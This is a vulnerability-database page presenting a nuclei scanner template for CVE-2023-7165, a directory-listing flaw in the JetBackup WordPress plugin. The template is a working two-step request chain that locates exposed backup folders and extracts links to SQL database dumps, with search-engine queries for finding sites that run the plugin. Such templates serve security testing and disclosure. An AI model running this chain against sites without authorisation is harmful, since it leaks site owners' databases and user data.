Lucene search
K

JetBackup <= 2.0.9.7 - Sensitive Information Exposure via Directory Listing

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 19 Views

JetBackup up to 2.0.9.9 allows directory listing and backup leakage; update to 2.0.9.9 or later.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-7165
27 Feb 202410:26
circl
CNNVD
WordPress plugin JetBackup security vulnerability
27 Feb 202400:00
cnnvd
CVE
CVE-2023-7165
27 Feb 202408:30
cve
Cvelist
CVE-2023-7165 JetBackup < 2.0.9.9 - Directory Listing Exposing Backups
27 Feb 202408:30
cvelist
NVD
CVE-2023-7165
27 Feb 202409:15
nvd
OSV
CVE-2023-7165
27 Feb 202409:15
osv
Patchstack
WordPress Backup Plugin < 2.0.9.9 is vulnerable to Sensitive Data Exposure
27 Feb 202400:00
patchstack
Prion
Information disclosure
27 Feb 202409:15
prion
Positive Technologies
PT-2024-15218
27 Feb 202400:00
ptsecurity
RedhatCVE
CVE-2023-7165
23 May 202505:22
redhatcve
Rows per page
id: CVE-2023-7165

info:
  name: JetBackup <= 2.0.9.7 - Sensitive Information Exposure via Directory Listing
  author: pussycat0x
  severity: high
  description: |
    JetBackup WordPress plugin <= 2.0.9.9 does not use index files to prevent directory listing in certain configurations, letting malicious actors leak backup files, exploit requires access to the web server.
  impact: |
    Attackers can access and leak sensitive backup files, potentially leading to data exposure and security breaches.
  remediation: |
    Update to version 2.0.9.9 or later that implements index files to prevent directory listing.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backup/jetbackup-wp-backup-migrate-restore-2097-sensitive-information-exposure-via-directory-listing
    - https://wpscan.com/vulnerability/ad1ef4c5-60c1-4729-81dd-f626aa0ce3fe/
    - https://plugins.trac.wordpress.org/changeset/3016772/backup
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-7165
    cwe-id: CWE-548
    cpe: cpe:2.3:a:developer177:jetbackup:*:*:*:*:*:wordpress:*:*
    epss-score: 0.01915
    epss-percentile: 0.77369
  metadata:
    verified: true
    max-request: 2
    vendor: jetbackup
    product: jetbackup
    framework: wordpress
    publicwww-query: "/wp-content/plugins/backup/"
    fofa-query: body="/wp-content/plugins/backup/"
    google-query: inurl:"/wp-content/uploads/jetbackup/"
    shodan-query: http.html:"/wp-content/plugins/backup/"
  tags: cve,cve2023,wordpress,wp-plugin,jetbackup,wp,unauth

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/uploads/jetbackup/"

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Index of","jetbackup")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: folder_name
        part: body
        group: 1
        regex:
          - 'href="([^"]*_D\d{14}[^"]*)/"'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/uploads/jetbackup/{{folder_name}}/"

    host-redirects: true
    max-redirects: 2

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, ".sgbp")'
          - 'status_code == 200'
        condition: and

    extractors:
      - type: regex
        name: database_dump
        part: body
        group: 1
        regex:
          - 'href="([^"]+_database\.sql)"'
        internal: true
# digest: 490a0046304402202aa5459e39a51feebae0a79d1abfe57bd049ecd540449e3da7448814f1149b3002207eb63a46d38dc8151b26929a7b7f8f907e6e2cd9c1b0085fd0978c8085c2987b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Apr 2026 03:37Current
7.2High risk
Vulners AI Score7.2
CVSS 3.17.5
EPSS0.01915
SSVC
19